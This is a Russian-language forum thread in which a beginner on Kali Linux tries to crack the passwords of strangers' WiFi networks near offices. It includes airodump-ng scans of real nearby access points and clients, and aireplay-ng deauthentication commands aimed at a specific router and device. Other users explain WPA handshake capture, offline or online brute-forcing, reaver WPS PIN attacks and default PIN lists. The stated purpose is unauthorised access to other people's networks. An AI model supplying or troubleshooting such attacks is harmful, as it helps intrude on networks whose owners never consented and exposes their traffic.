Просмотр полной версии : Проблемы с перехватом хендшейка
Василий-Шишкин
11.05.2015, 22:14
Добрый вечер.
В первые пробую взломать пороль WiFi, установил ОС Kali Linux, работаю на ноутбуке от Lenovo G50-30.
Прочитал статью по ссылке (тоже на этом форуме) (https://antichat.live/threads/309017/), и много других.
Что я делал:
- подключил WiFi адаптер Alfa AWUS036H.
- переключил в режим мониторинга:
[CODE]
root@kali-Linux:~# airodump-ng mon0
CH 3 ][ Elapsed: 4 s ][ 2015-05-11 19:29
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BC:F6:85:BF:C0:E6 -59 2 0 0 4 54e WPA CCMP PSK Kira-
10:BF:48:E6:55:18 -70 4 0 0 6 54e WPA2 CCMP PSK Roofl
B0:B2:DC:DC:C5:59 -63 3 0 0 8 54e WPA2 CCMP PSK Archi
D4:21:22:53:CE:65 -76 6 0 0 8 54e WPA2 CCMP PSK MGTS_
B0:B2:DC:DC:C5:58 -67 11 0 0 8 54e WPA2 CCMP PSK Archi
60:A4:4C:DE:45:48 -74 2 0 0 4 54e WPA2 CCMP PSK ASUS
C0:C1:C0:48:76:8F -74 2 0 0 2 54e. WPA2 CCMP PSK Alati
60:A4:4C:A2:B7:F8 -65 2 0 0 13 54e WPA2 CCMP PSK TAGNA
00:14:D1:A5:4A:95 -67 2 0 0 11 54e. WPA2 CCMP PSK SPIDE
D8:50:E6:D7:39:60 -67 12 3 0 6 54e WPA2 CCMP PSK Anako
00:22:15:71:2A:E5 -59 20 3 0 6 54 WPA TKIP PSK WL520
00:1C:F0:3B:C3:05 -66 18 4 1 6 54 . WPA TKIP PSK dlink
C4:6E:1F:D5:AE:8A -71 2 0 0 6 54e. WPA2 CCMP PSK TP-LI
90:E6:BA:F1:6C:30 -57 3 2 0 6 54 WPA2 CCMP PSK proje
00:25:9C:F7:36:85 -53 21 0 0 9 54e. WPA2 CCMP PSK Port
D4:21:22:99:45:61 -75 3 0 0 1 54e WPA2 CCMP PSK MGTS_
00:17:9A:84:FD:45 -71 3 0 0 3 54 . WPA2 CCMP PSK 2b4A9
C2:9F:DB:F7:43:B4 -69 0 3 0 1 -1 OPN
Mister_Bert0ni
11.05.2015, 22:23
↑ (https://antichat.live/posts/3845903/)
В чем ошибка ума не приложу, весь русские и английские форумы и статьи прочитал и облазил, полностю в ТУПИКЕ.
Заранее благодарен.
Не внимательно читаешь скорее всего раз не понимаешь для чего ты команды вводишь.
Может видео поможет..
Василий-Шишкин
11.05.2015, 22:31
на английском возможно, что много пропустил, так как не владею английским на 100%. Поэтому очень даже может быть.
А видео я почти не смотрел, спасибо
Василий-Шишкин
11.05.2015, 22:46
↑ (https://antichat.live/posts/3845913/)
Не внимательно читаешь скорее всего раз не понимаешь для чего ты команды вводишь.
Может видео поможет..
т.е. я правельно понимаю, что хендшейк нужен, чтобы взломать с помощью reaver, а если брутом то он вовсе не нужен?
Mister_Bert0ni
11.05.2015, 23:13
↑ (https://antichat.live/posts/3845930/)
т.е. я правельно понимаю, что хендшейк нужен, чтобы взломать с помощью reaver, а если брутом то он вовсе не нужен?
Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?
А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда роутер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов http://k0derz.ru/база-wps-pin-кодов/ (http://k0derz.ru/%D0%B1%D0%B0%D0%B7%D0%B0-wps-pin-%D0%BA%D0%BE%D0%B4%D0%BE%D0%B2/).
Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:
wash -i mon0
Василий-Шишкин
12.05.2015, 07:47
↑ (https://antichat.live/posts/3845945/)
Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?
А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда Ротер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов
http://k0derz.ru/база-wps-pin-кодов/ (http://k0derz.ru/%D0%B1%D0%B0%D0%B7%D0%B0-wps-pin-%D0%BA%D0%BE%D0%B4%D0%BE%D0%B2/)
.
Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:
wash -i mon0
И опять же у этого парня (девушки) в видео сразу поймал клиентов, которые подключены к тому или иному wifi -ю. А у меня этого не происходит. Вот поэтому я сюда и обратился. Как это исправить?
BabaDook
12.05.2015, 08:17
↑ (https://antichat.live/posts/3845930/)
т.е. я правельно понимаю, что хендшейк нужен, чтобы взломать с помощью reaver, а если брутом то он вовсе не нужен?
нет не правельно
Василий-Шишкин
12.05.2015, 08:20
Вот сегодня вышел "прогуляться" и около офисного здания попробовал снова, что получится:
CH 4 ][ Elapsed: 44 s ][ 2015-05-12 07:13 ][ display sta only
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 5C:93:A2:9E:E2:07 -67 0 - 1 0 1
(not associated) 9C:AD:97:4D:37:19 0 0 - 1 0 13
(not associated) 00:C0:CA:81:EC:0E 4 0 - 1 0 4
(not associated) 1C:7B:21:97:E5:A2 -57 0 - 1 0 5
(not associated) C0:64:C6:4F:F2:B0 -63 0 - 1 134 15 HOME_5_GHz,ASUS_5G,33RUS
(not associated) 58:12:43:BB:AD:90 -65 0 - 1 0 2
(not associated) AC:22:0B:21:62:BB -63 0 - 5 3622 593 AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime
(not associated) 34:08:04:32:FF:2A -67 0 - 1 0 2
(not associated) 00:1F:3C:B1:EB:0E -67 0 - 1 0 5
(not associated) 48:59:29:F6:D3:1E -67 0 - 1 0 3
(not associated) 74:2F:68:83:F1:60 -69 0 - 1 32 9
(not associated) 90:A4:DE:5E:ED:47 -69 0 - 1 0 4
(not associated) C4:42:02:E1:55:CD -69 0 - 1 0 15 KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т
(not associated) 88:63:DF:2A:FE:0E -69 0 - 1 0 1 slnkv
(not associated) BC:F5:AC:9E:9A:D9 -69 0 - 1 0 1
(not associated) 00:26:C7:03:22:B8 -69 0 - 1 0 10
(not associated) 38:63:F6:06:30:52 -71 0 - 1 0 3
(not associated) B0:65:BD:99:BD:AC -71 0 - 1 0 4 mwmp,wmp
(not associated) 00:25:D3:6B:0B:CF -71 0 - 1 0 1
(not associated) F0:7B:CB:95:48:79 -71 0 - 1 0 1 dlink
(not associated) 68:17:29:F1:A7:B1 -71 0 - 1 35 4
(not associated) C4:85:08:3C:AD:07 -71 0 - 1 76 2 Normanykt
(not associated) DC:85:DE:8A:A5:31 -73 0 - 1 34 6
(not associated) 68:94:23:24:92:9A -63 0 - 1 96 48 AP-SGP
(not associated) 9C:2A:70:1A:E2:89 -73 0 - 1 38 12 Artur
(not associated) F0:F6:1C:2D:FE:87 -73 0 - 1 0 1
(not associated) 40:0E:85:3A:72:E3 -73 0 - 1 0 1 sshipulin_guest
(not associated) 1C:B0:94:C7:4D:8A -73 0 - 1 0 5 TRENDnet651
(not associated) 50:B7:C3:DE:87:2D -75 0 - 1 0 1
(not associated) 7C:E9:D3:B0:05:16 -75 0 - 1 91 16 AP-SGP
CH 1 ][ Elapsed: 48 s ][ 2015-05-12 07:13 ][ display sta only
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 18:F4:6A:33:37:83 -67 0 - 1 0 1
(not associated) 00:C0:CA:81:EC:0E 4 0 - 1 0 4
(not associated) 9C:AD:97:4D:37:19 0 0 - 1 0 13
(not associated) 1C:7B:21:97:E5:A2 -57 0 - 1 0 5
(not associated) C0:64:C6:4F:F2:B0 -63 0 - 1 0 15 HOME_5_GHz,
(not associated) 68:94:23:24:92:9A -63 0 - 1 0 48 AP-SGP
(not associated) 00:E1:85:09:01:1C -65 0 - 1 2 3
(not associated) 58:12:43:BB:AD:90 -65 0 - 1 0 2
(not associated) AC:22:0B:21:62:BB -65 0 - 5 1873 679 AVK119,ASUS
(not associated) 5C:93:A2:9E:E2:07 -67 0 - 1 0 1
(not associated) 34:08:04:32:FF:2A -67 0 - 1 0 2
(not associated) 00:1F:3C:B1:EB:0E -67 0 - 1 0 5
(not associated) 48:59:29:F6:D3:1E -67 0 - 1 0 3
(not associated) 74:2F:68:83:F1:60 -69 0 - 1 0 9
(not associated) 90:A4:DE:5E:ED:47 -69 0 - 1 0 4
(not associated) C4:42:02:E1:55:CD -69 0 - 1 0 15 KafeBryans,
(not associated) 88:63:DF:2A:FE:0E -69 0 - 1 0 1 slnkv
(not associated) BC:F5:AC:9E:9A:D9 -69 0 - 1 0 1
CH 13 ][ Elapsed: 1 min ][ 2015-05-12 07:14 ][ display sta only
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 9C:AD:97:4D:37:19 0 0 - 1 0 26
(not associated) 00:C0:CA:81:EC:0E 0 0 - 1 0 8
(not associated) 1C:7B:21:97:E5:A2 -57 0 - 1 0 5
(not associated) 00:E1:85:09:01:1C -61 0 - 1 51 5
(not associated) C0:64:C6:4F:F2:B0 -63 0 - 1 0 15 HOME_5_GHz,ASUS_5G,33RUS
(not associated) 1C:B0:94:C7:4D:8A -63 0 - 1 0 8 TRENDnet651
(not associated) AC:22:0B:21:62:BB -67 0 - 5 1128 987 AVK119,ASUS,HP-Print-32-Deskjet 3520 series,default,Smart_box-CEB676_guest,onlime
(not associated) 58:12:43:BB:AD:90 -65 0 - 1 0 2
(not associated) 18:F4:6A:33:37:83 -67 0 - 1 0 1
(not associated) 5C:93:A2:9E:E2:07 -67 0 - 1 0 1
(not associated) 34:08:04:32:FF:2A -67 0 - 1 0 2
(not associated) 00:1F:3C:B1:EB:0E -67 0 - 1 0 5
(not associated) 48:59:29:F6:D3:1E -67 0 - 1 0 3
(not associated) 68:94:23:24:92:9A -67 0 - 1 30 61 AP-SGP
(not associated) 00:26:C7:03:22:B8 -67 0 - 1 30 14
(not associated) 9C:2A:70:1A:E2:89 -67 0 - 1 80 20 Artur
(not associated) 74:2F:68:83:F1:60 -67 0 - 1 16 16
(not associated) B4:52:7E:92:A2:49 -69 0 - 1 0 1
(not associated) 90:A4:DE:5E:ED:47 -69 0 - 1 0 4
(not associated) C4:42:02:E1:55:CD -69 0 - 1 0 15 KafeBryans,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.ТС-684496,�.�.Т
(not associated) 88:63:DF:2A:FE:0E -69 0 - 1 0 1 slnkv
(not associated) 00:26:AB:61:C2:54 -69 0 - 1 42 33 Screen
(not associated) B0:5C:E5:C2:0E:24 -71 0 - 1 0 1
(not associated) 00:08:CA:28:82:C1 -71 0 - 1 0 6
(not associated) 1C:4B:D6:DE:76:AA -71 0 - 1 0 3
(not associated) 38:63:F6:06:30:52 -71 0 - 1 0 3
(not associated) B0:65:BD:99:BD:AC -71 0 - 1 0 4 mwmp,wmp
(not associated) 00:25:D3:6B:0B:CF -71 0 - 1 0 1
(not associated) F0:7B:CB:95:48:79 -71 0 - 1 0 1 dlink
(not associated) 68:17:29:F1:A7:B1 -71 0 - 1 0 4
снова тоже самое 1000-и клиентов и ни один человек не подключен к точки доступа. Как так?
Каким образом aireplay-ng будет отключать клиентов, если он их даже не видет, или besside-ng, получается без клиентов у меня нет шансов взломать пороль WiFi?
Василий-Шишкин
12.05.2015, 08:22
↑ (https://antichat.live/posts/3846026/)
нет не правельно
Спасибо, с этим я уже разобрался, вот с клиентами нет
BabaDook
12.05.2015, 08:49
↑ (https://antichat.live/posts/3846031/)
Спасибо, с этим я уже разобрался, вот с клиентами нет
что с ними не так ?
Василий-Шишкин
12.05.2015, 08:59
Одного клиента спустя 2 дня поиска наконец то обнаружил:
CH 10 ][ Elapsed: 51 min ][ 2015-05-12 07:45
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
2C:AB:25:0B:B5:1C -1 0 0 0 -1 -1
B0:B2:DC:88:29:54 -1 0 0 0 -1 -1
00:11:24:98:61:E8 -1 0 0 0 -1 -1
64:66:B3:53:F9:6C -1 0 0 0 -1 -1
1C:BD:B9:2B:E6:00 -28 3 0 0 6 54e. WPA2 CCMP PSK Indiweed
-------- 20:CF:30:D6:46:DB -64 34 0 0 12 54e WPA2 CCMP PSK JackVorobey
EE:43:F6:03:F5:A8 -53 132 13 0 9 54e WPA2 CCMP PSK
F4:6D:04:7D:88:07 -58 79 3 0 6 54 WPA2 TKIP PSK smirnoff
10:FE:ED:4A:3F:E2 -57 124 8 0 4 54e. WPA2 CCMP PSK Imgnp
00:18:E7:FC:95:80 -57 69 0 0 13 54 . WPA2 CCMP PSK gersan3
CC:5D:4E:FE:1C:E8 -59 83 0 0 11 54e WPA2 CCMP PSK Gosp
EC:43:F6:DD:12:DC -63 37 1 0 4 54e WPA2 CCMP PSK Keenetic-7833
F4:6D:04:C3:B9:14 -60 72 0 0 6 54e WPA2 CCMP PSK Vandam
54:A0:50:DD:40:DC -60 24 2 0 1 54e WPA2 CCMP PSK wifi513
10:BF:48:E6:42:AF -61 47 1 0 6 54e WPA2 CCMP PSK ASUS
F8:C0:91:25:A9:88 -61 46 0 0 13 54e WPA2 CCMP PSK Upvel
D8:5D:4C:D6:14:92 -63 47 3 0 7 54e. WPA2 CCMP PSK FreeWiFi
78:24:AF:7E:A3:5C -64 46 3 0 6 54e WPA2 CCMP PSK ASUS
D8:50:E6:AF:48:40 -64 20 3 0 6 54e WPA2 CCMP PSK Olimpiya
20:4E:7F:51:4A:FE -62 75 0 0 3 54e. WPA2 CCMP PSK makap
14:DA:E9:79:B6:7C -64 23 0 0 13 54e OPN MrBoshi
52:68:9D:EA:FD:F0 -65 32 0 0 1 54e. WPA2 CCMP PSK 10-11b
1C:7E:E5:92:EA:6C -65 6 0 0 1 54e WPA2 CCMP PSK DIR-620 1
38:1C:1A:2E:93:E0 -65 25 0 0 6 54e. WPA2 CCMP MGT bmstu_student
64:70:02:CA:3D:E2 -65 13 0 0 11 54e. WPA2 CCMP PSK Service
14:DA:E9:F8:FA:A4 -65 4 0 0 13 54e WPA2 CCMP PSK rb1
00:23:54:73:99:D2 -66 7 1 0 9 54 WPA2 CCMP PSK Asus
38:1C:1A:2E:93:E2 -67 21 0 0 6 54e. OPN bmstu_staff
D4:BF:7F:01:78:B8 -67 17 0 0 9 54e WPA2 CCMP PSK 514KZ
D4:BF:7F:01:B4:48 -67 11 0 0 9 54e WPA2 CCMP PSK PUSSY
CH 12 ][ Elapsed: 28 s ][ 2015-05-12 07:45 ][ display sta only
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 00:C0:CA:81:EC:0E 0 0 - 1 0 4
(not associated) 9C:8E:99:08:14:34 -57 0 - 1 33 37 UI.RU-IU.RU
(not associated) 88:70:8C:14:8A:B2 -55 0 - 1 5 4
(not associated) A4:EE:57:6F:C7:A3 -55 0 - 1 42 14
(not associated) 6C:40:08:DC:81:7F -57 0 - 1 22 2
(not associated) 00:81:6A:3B:4F:81 -63 0 - 1 0 3
(not associated) 24:FD:52:B5:2E:CC -65 0 - 1 0 3
(not associated) 24:0A:64:B6:8C:EB -65 0 - 1 0 7
(not associated) DC:85:DE:25:8B:1A -67 0 - 1 0 1 ASUS
(not associated) 24:0A:64:B1:72:9B -69 0 - 1 0 1
(not associated) 74:F0:6D:75:72:74 -71 0 - 1 0 1
(not associated) 94:39:E5:53:A3:F7 -71 0 - 1 49 2
20:CF:30:D6:46:DB 9C:AD:97:4D:37:19 0 0 - 1 5 173
Снова пробую перехватить:
CH 1 ] [ Elapsed: 33 mins ][ 2015-05-12 07:56
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
20:CF:30:D6:46:DB -65 323 0 0 12 54e WPA2 CCMP PSK JackV
BSSID STATION PWR Rate Lost Frames Probe
одновременно пробую отключить клиента :
root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
07:55:13 Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
07:55:13 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
Снова не получается.
Василий-Шишкин
12.05.2015, 09:03
↑ (https://antichat.live/posts/3846035/)
что с ними не так ?
Не могу отключить их пишет:
root@kali-Linux:~# aireplay-ng --deauth 5 -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
07:55:13 Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
07:55:13 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
если добовляю essid, то:
root@kali-Linux:~# aireplay-ng --deauth 5 -e JackVorobey -a 20:CF:30:D6:46:DB -c 9C:AD:97:4D:37:19 mon0
08:02:06 Waiting for beacon frame (BSSID: 20:CF:30:D6:46:DB) on channel -1
08:02:06 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
BabaDook
12.05.2015, 09:15
--ignore-negative-one для кого эта строчка?
Василий-Шишкин
12.05.2015, 09:32
↑ (https://antichat.live/posts/3846044/)
--ignore-negative-one для кого эта строчка?
Это и есть мой вопрос, почему он не хочет отключить клиента, а выдает какое-то "Г"?
--ignore-negative-one - сам не знаю что такое
вот что выдает help к команде aireplay-ng:
root@kali-Linux:~# aireplay-ng --help
Aireplay-ng 1.2 rc1 - (C) 2006-2013 Thomas d'Otreppe
http://www.aircrack-ng.org
usage: aireplay-ng
Filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection
Replay options:
-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet
Fakeauth attack options:
-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time
Arp Replay attack options:
-j : inject FromDS packets
Fragmentation attack options:
-k IP : set destination IP in fragments
-l IP : set source IP in fragments
Test attack options:
-B : activates the bitrate test
Source options:
-i iface : capture packets from this interface
-r file : extract packets from this pcap file
Miscellaneous options:
-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
--help : Displays this usage screen
почти в самом конце
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211
Как можно исправить?
BabaDook
12.05.2015, 09:33
↑ (https://antichat.live/posts/3846050/)
Это и есть мой вопрос, почему он не хочет отключить клиента, а выдает какое-то "Г"?
--ignore-negative-one - сам не знаю что такое
под твоей темой специально для тебя скопировал статью
Василий-Шишкин
12.05.2015, 09:41
↑ (https://antichat.live/posts/3846051/)
под твоей темой специально для тебя скопировал статью
Я недавно в Античат, не знаю где это "под темой" можно ссылку или просто вставить(как сообщение)?
Василий-Шишкин
12.05.2015, 09:50
↑ (https://antichat.live/posts/3845945/)
Handshake как раз таки нужен для брута.Что бы проще тебе было понять - Handshake - это момент рукопожатия между точкой и клиентом(момент когда клиент передает пароль точке в шифрованном виде)А брут - это процес перебора(как бы угадать пароль из словаря в котором он может быть) пароля.Если у нас не будет handshake-a то нам не будет что брутит.Понимаешь?
А reaver - это другое кино... REAVER это утилита для перебора ПИНов когда роутер уязвим по протоколу WPS(WIireless Protected Setup).Здесь как раз таки handshake не нужен.В вардрайвинге есть такой приоритет взлома,что если есть WPS то сначала ломается он а аж потом брут если первый этап не даст результатов так как WPS ломается быстрее и проще.А прежде чем ломать WPS стоит проверить наличия ПИНа от роутера на наличие в списке стандартных пинов
http://k0derz.ru/база-wps-pin-кодов/ (http://k0derz.ru/%D0%B1%D0%B0%D0%B7%D0%B0-wps-pin-%D0%BA%D0%BE%D0%B4%D0%BE%D0%B2/)
.
Проверить есть ли на роутере WPS можно утилитой wash в Kali Linux на пример так:
wash -i mon0
Если я перехватил отличный хендшейк, я могу например брутить его дома или мне обязательно быть в зоне действия роутера.
Спрашиваю, потому что Вы говорите брутить хендшейк, тогда зачем соединение с роутером, по идее можно его про брутить узнать пороль и просто приходить на то место и подключаться к нему, можно так?
Если так, то было б велеколепно я с планшетным ноутбуком по перехватываю хендшейки, а дома с "крутой" быстрой и мощной видеокартой про брутю все хендшейки, а с ноутбуком я 10 лет взламывать буду)
BabaDook
12.05.2015, 09:52
↑ (https://antichat.live/posts/3846056/)
Если я перехватил отличный хендшейк, я могу например брутить его дома или мне обязательно быть в зоне действия роутера.
Спрашиваю, потому что Вы говорите брутить хендшейк, тогда зачем соединение с роутером, по идее можно его про брутить узнать пороль и просто приходить на то место и подключаться к нему, можно так?
Если так, то было б велеколепно я с планшетным ноутбуком по перехватываю хендшейки, а дома с "крутой" быстрой и мощной видеокартой про брутю все хендшейки, а с ноутбуком я 10 лет взламывать буду)
Где хочешь там и брути, можешь в инете брутить, есть спец сервисы
Василий-Шишкин
12.05.2015, 09:55
↑ (https://antichat.live/posts/3846059/)
Где хочешь там и брути, можешь в инете брутить, есть спец сервисы
Это очень хорошая информация, только хендшейк перехватить не получается.
Вы говорили про статью, подскажите, где она.
BabaDook
12.05.2015, 09:56
↑ (https://antichat.live/posts/3846061/)
Это очень хорошая информация, только хендшейк перехватить не получается.
Вы говорили про статью, подскажите, где она.
/threads/425082/ (https://antichat.live/threads/425082/)
Василий-Шишкин
12.05.2015, 09:57
↑ (https://antichat.live/posts/3846063/)
/threads/425082/ (https://antichat.live/threads/425082/)
) это вы уже писали, проблема в том, что я не знаю где это, так лучше, спасибо
А понял, где это под моей темой, в списке всех тем, сначала понял в моей теме под ней, поэтому не мог найти
Василий-Шишкин
12.05.2015, 10:08
В той статье опять же сразу есть клиенты а у меня их нет!
CH 12 ][ Elapsed: 1 hour 10 min ][ 2015-05-12 09:07 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
20:CF:30:D6:46:DB -40 58 166 0 0 12 54e WPA2 CCMP PSK J
BSSID STATION PWR Rate Lost Frames Probe
Видите, там "Data" написано 0.
Нет ни кого. И так на всех.
BabaDook
12.05.2015, 10:10
↑ (https://antichat.live/posts/3846069/)
В той статье опять же сразу есть клиенты а у меня их нет!
CH 12 ][ Elapsed: 1 hour 10 min ][ 2015-05-12 09:07 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
20:CF:30:D6:46:DB -40 58 166 0 0 12 54e WPA2 CCMP PSK J
BSSID STATION PWR Rate Lost Frames Probe
Видите, там "Data" написано 0.
Нет ни кого. И так на всех.
тогда ты не перехватишь
Василий-Шишкин
12.05.2015, 10:10
↑ (https://antichat.live/posts/3846070/)
тогда ты не перехватишь
в смысле почему? Я одновремено пытался отключить клиента, который раннее подключался к ней
Василий-Шишкин
12.05.2015, 10:15
CH 4 ][ Elapsed: 1 min ][ 2015-05-12 09:13 ][ display sta only
BSSID STATION PWR Rate Lost Frames Probe
------ (not associated) 9C:AD:97:4D:37:19 0 0 - 1 0 13
(not associated) 00:C0:CA:81:EC:0E -47 0 - 1 0 14
(not associated) A4:EE:57:6F:C7:A3 -55 0 - 1 42 37
(not associated) A0:EC:80:FC:5C:06 -57 0 - 1 0 6
(not associated) EC:0E:C4:22:7D:BF -59 0 - 1 0 2
(not associated) 40:30:04:93:26:14 -59 0 - 1 0 4
(not associated) 18:67:B0:7D:29:B3 -61 0 - 1 49 21 ������,Zyubin,wi-fi
(not associated) 88:9F:FA:04:E4:D7 -61 0 - 1 0 4 1q2w3e4r
(not associated) E0:CB:EE:3F:8E:87 -61 0 - 1 0 1
(not associated) 9C:8E:99:08:14:34 -51 0 - 1 18 89 UI.RU-IU.RU
(not associated) A8:96:8A:8F:01:FA -65 0 - 1 0 4
(not associated) 60:21:C0:80:A1:D4 -65 0 - 1 0 2
(not associated) 18:67:B0:81:6D:05 -65 0 - 1 0 3 514KZ
(not associated) 74:E1:B6:C3:88:82 -67 0 - 1 0 2 DLink
(not associated) 68:17:29:EE:40:B7 -67 0 - 1 0 1
(not associated) CC:3A:61:EA:D6:51 -67 0 - 1 0 5
(not associated) CA:48:E9:2F:54:0B -67 0 - 1 0 2
(not associated) 74:F0:6D:75:72:74 -67 0 - 1 0 2
(not associated) 00:26:82:65:8F:91 -65 0 - 1 30 24
(not associated) A4:C3:61:58:30:58 -67 0 - 1 0 3
(not associated) DC:85:DE:25:8B:1A -67 0 - 1 0 2 ASUS
(not associated) 40:2C:F4:02:19:EE -67 0 - 1 0 1
(not associated) 44:6D:57:87:BF:7B -67 0 - 1 0 7
(not associated) 50:B7:C3:DE:3A:EB -69 0 - 1 0 7
(not associated) 9C:A9:E4:B8:64:C4 -69 0 - 1 0 1
(not associated) 20:02:AF:30:82:4C -69 0 - 1 0 7
(not associated) 48:5D:60:88:2C:68 -69 0 - 1 0 1
(not associated) 34:23:BA:4C:D8:94 -69 0 - 1 0 9
(not associated) 74:F0:6D:92:2C:D2 -69 0 - 1 0 1
(not associated) 8C:FA:BA:B8:44:9B -69 0 - 1 0 2
Первый самый, он был раньше подключен, только вот инетресно почему теперь мой ноутбук не может определить, к чему он подключен, не сидит он же без инета(клиент)
BabaDook
12.05.2015, 10:28
что -то ты не то делаешь
Василий-Шишкин
12.05.2015, 11:43
↑ (https://antichat.live/posts/3846083/)
что -то ты не то делаешь
Хорошее замечание, для этой цели я написал свой вопрос.
BabaDook
12.05.2015, 11:55
пиши команды которые выполняешь , то что я вижу ты никак не поймаешь его
Василий-Шишкин
12.05.2015, 12:04
↑ (https://antichat.live/posts/3846124/)
пиши команды которые выполняешь , то что я вижу ты никак не поймаешь его
Самое самое начало. Там вроде я все описал, или вам надо что-то еще . Скажите, какие команды вам ещё нужны, по моему то что я описал то я и делал.
BabaDook
12.05.2015, 12:27
↑ (https://antichat.live/posts/3846075/)
CH 4 ][ Elapsed: 1 min ][ 2015-05-12 09:13 ][ display sta only
BSSID STATION PWR Rate Lost Frames Probe
------ (not associated) 9C:AD:97:4D:37:19 0 0 - 1 0 13
(not associated) 00:C0:CA:81:EC:0E -47 0 - 1 0 14
(not associated) A4:EE:57:6F:C7:A3 -55 0 - 1 42 37
(not associated) A0:EC:80:FC:5C:06 -57 0 - 1 0 6
(not associated) EC:0E:C4:22:7D:BF -59 0 - 1 0 2
(not associated) 40:30:04:93:26:14 -59 0 - 1 0 4
(not associated) 18:67:B0:7D:29:B3 -61 0 - 1 49 21 ������,Zyubin,wi-fi
(not associated) 88:9F:FA:04:E4:D7 -61 0 - 1 0 4 1q2w3e4r
(not associated) E0:CB:EE:3F:8E:87 -61 0 - 1 0 1
(not associated) 9C:8E:99:08:14:34 -51 0 - 1 18 89 UI.RU-IU.RU
(not associated) A8:96:8A:8F:01:FA -65 0 - 1 0 4
(not associated) 60:21:C0:80:A1:D4 -65 0 - 1 0 2
(not associated) 18:67:B0:81:6D:05 -65 0 - 1 0 3 514KZ
(not associated) 74:E1:B6:C3:88:82 -67 0 - 1 0 2 DLink
(not associated) 68:17:29:EE:40:B7 -67 0 - 1 0 1
(not associated) CC:3A:61:EA:D6:51 -67 0 - 1 0 5
(not associated) CA:48:E9:2F:54:0B -67 0 - 1 0 2
(not associated) 74:F0:6D:75:72:74 -67 0 - 1 0 2
(not associated) 00:26:82:65:8F:91 -65 0 - 1 30 24
(not associated) A4:C3:61:58:30:58 -67 0 - 1 0 3
(not associated) DC:85:DE:25:8B:1A -67 0 - 1 0 2 ASUS
(not associated) 40:2C:F4:02:19:EE -67 0 - 1 0 1
(not associated) 44:6D:57:87:BF:7B -67 0 - 1 0 7
(not associated) 50:B7:C3:DE:3A:EB -69 0 - 1 0 7
(not associated) 9C:A9:E4:B8:64:C4 -69 0 - 1 0 1
(not associated) 20:02:AF:30:82:4C -69 0 - 1 0 7
(not associated) 48:5D:60:88:2C:68 -69 0 - 1 0 1
(not associated) 34:23:BA:4C:D8:94 -69 0 - 1 0 9
(not associated) 74:F0:6D:92:2C:D2 -69 0 - 1 0 1
(not associated) 8C:FA:BA:B8:44:9B -69 0 - 1 0 2
